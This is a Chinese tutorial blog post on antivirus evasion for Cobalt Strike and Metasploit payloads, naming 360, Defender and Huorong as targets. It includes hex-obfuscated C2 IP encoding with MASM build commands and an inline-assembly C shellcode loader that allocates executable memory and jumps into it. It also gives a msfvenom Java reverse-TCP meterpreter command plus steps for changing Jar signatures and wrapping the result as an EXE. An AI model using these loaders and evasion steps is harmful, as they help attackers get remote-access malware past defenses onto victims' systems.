第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包

这篇具有很好参考价值的文章主要介绍了第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包,免杀对抗,java,汇编,c语言文章来源地址https://www.toymoban.com/news/detail-600991.html

知识点

#知识点:
1、ASM-CS-单汇编&内联C
2、JAVA-MSF-源码修改&打包

#章节点:
编译代码面-ShellCode-混淆
编译代码面-编辑执行器-编写
编译代码面-分离加载器-编写
程序文件面-特征码定位-修改
程序文件面-加壳花指令-资源
代码加载面-Dll反射劫持-加载
权限逻辑面-杀毒进程干扰-结束
工具数据面-通讯内存流量-动态

对抗目标:
X60 Defender 某绒 管家 VT等

编程语言:
C/C++  Python C# Go Powershell Ruby Java ASM等

涉及技术:
ShellCode混淆加密,无文件落地,分离拆分,白名单,DLL加载,Syscall,加壳加花,
资源修改,特征修改,二次开发CS,内存休眠,进程注入,反沙盒,反调试,CDN解析等

演示案例

1、ASM-ShellCode-纯汇编&内联C混编-CS
2、JAVA-ShellCode-源码修改&打包EXE-MSF
#ASM-ShellCode-纯汇编&内联C混编-CS
1、编译汇编代码实现CS免杀
来源:https://forum.butian.net/share/1536
IP地址:
30h,2fh,2dh,30h,32h,2fh,2dh,33h,2dh,31h,2fh,33h,00h
10.130.4.204
30=1,2f=0,2d=.,32=3,33=4,31=2 依次内推
47.94.236.117
33h,36h,2dh,38h,33h,2dh,31h,32h,35h,2dh,30h,30h,36h,00h
端口:82=52h 88=28h
编译器:https://www.masm32.com/
编译为obj文件:ml /c /coff /Cp test.asm
生成exe文件:link /subsystem:console /libpath:c:\masm32\lib test.obj

2、内联C混编,花指令-生成导入
int main() {
    LPVOID lp = GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
    size_t dw_size = sizeof(buf);
    void* exec = NULL;
    __asm
    {
        push 0x40; //可读可写可执行页参数入栈
        push 0x1000; //MEM_COMMIT参数值入栈
        mov eax, dw_size; //定义空间大小
        push eax; //将空间大小入栈
        push 0; //由系统自行决定内存空间起始地址入栈
        mov eax, lp; //移动到virtualAlloc函数地址
        call eax; //运行该函数
        mov exec, eax;//调用地址
    }
    LPVOID op = GetProcAddress(LoadLibraryA("kernel32.dll"), "RtlMoveMemory");
    __asm
    {
        mov eax, dw_size;
        push eax;
        lea eax, buf;
        push eax;
        mov ecx, exec;
        push ecx;
        mov eax, op;
        call eax;
    }
    __asm
    {
        jmp exec;
    }
    return 0;
}

#JAVA-ShellCode-源码修改&打包EXE-MSF
1、JAR包源码特征修改免杀
msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar
-Jar反编译导出-jdgui
-修改上线配置-config
-修改启动主类-MANIFEST.MF
-修改执行代码-Main.java
-打包class-javac Main.java
-编译jar-jar cvfm xiaodi.jar META-INF/MANIFEST.MF .

2、JAR包打包EXE执行免杀
安装:exe4j Inno进行打包
exe4j-下载链接:https://exe4j.apponic.com/
inno-下载链接:https://jrsoftware.org/isdl.php
操作说明:https://www.jb51.net/article/236000.htm

到了这里,关于第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Shellcode免杀对抗(C/C++)

    C/C++基于cs/msf的上线 首先是测试一下shellcode上线,主要是俩种方法 测试环境 攻击机:kali2023 靶机:win10 msf方法 首先是启动msf 然后msf生成一个shellcode代码 或者是x64 注意这里的x64不同在后面如果没有使用对应的编译环境,可能会造成无法上线 这里生成的一个payload,将其编译

    2024年02月22日
    浏览(52)
  • C语言ASM(GCC Inline ASM)汇编内嵌语法

    GCC 支持在C/C++代码中嵌入汇编代码,这些汇编代码被称作GCC Inline ASM——GCC内联汇编。这是一个非常有用的功能,有利于我们将一些C/C++语法无法表达的指令直接潜入C/C++代码中,另外也允许我们直接写 C/C++代码中使用汇编编写简洁高效的代码。 1.基本内联汇编 GCC中基本的内联

    2024年02月15日
    浏览(37)
  • 免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

    C/C++ -- ShellCode - 免杀对抗 介绍:          shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。 为什么要使用 shellcode :

    2024年02月09日
    浏览(39)
  • 权限提升WIN篇(腾讯云,CS,MSF)

    操作系统版本 ver,systeminfo 漏洞补丁信息 systeminfo 操作系统位数 systeminfo 杀软防护 tasklist /svc 网络 netstat -ano,ipconfig 当前权限 whoami 根据前面的信息收集中的系统版本,位数和补丁情况筛选出合适的EXP 根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作 如

    2024年02月07日
    浏览(40)
  • 免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

    cs 上线 1. 生成 shellcode-c 或者 python 2. 打开 pycharm 工具,创建一个 py 文件,将原生态执行代码复制进去 shellcode 执行代码: 3.将生成的shellcode放到执行代码中,运行代码,cs成功上线 MSF 上线 1.执行命令,生成shellcode 命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129

    2024年02月09日
    浏览(51)
  • 72 内网安全-域横向CS&MSF联动及应急响应初识

    权限维持留到后面在补充,先把后面的知识点给大家讲起来,因为权限维持它是我们前期如果拿到权限之后,能做的事情,前期没有拿到权限的话,这个东西是个多余的技术,所以我们还是比较偏向于攻击方面,像权限维持是为了自身知识的全面性才讲的 CS和msf的联动,这个

    2024年02月03日
    浏览(40)
  • 内网安全-代理Socks协议&CS-MSF控制上线

    目录 实验前提 实验环境 实验目标 环境部署 实验1 msf通信win10的56网段与正向连接  msf通信win10 msf上线win10 实验2 cs通信win10的56网段与正向连接 cs通信win10 cs上线win10   实验环境 本地计算机存在一个36网段可以与win7ping通并且可以上网。 win7存在36和52网段,可以与本地和win10p

    2024年02月16日
    浏览(38)
  • 遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

    #  zTian.red: 绕过卡巴 斯基、360安全卫士、Windows Defender动态执行CS、MSF命令... 测试目标:Windows Defender、卡巴斯基、360安全卫士极速版 系统环境:win10 64位    软件版本:cs4.7破解版、msf社区免费版  流量通信:http与https 测试平台:遮天对抗平台,地址:zTian.red 测试时间:

    2023年04月08日
    浏览(47)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包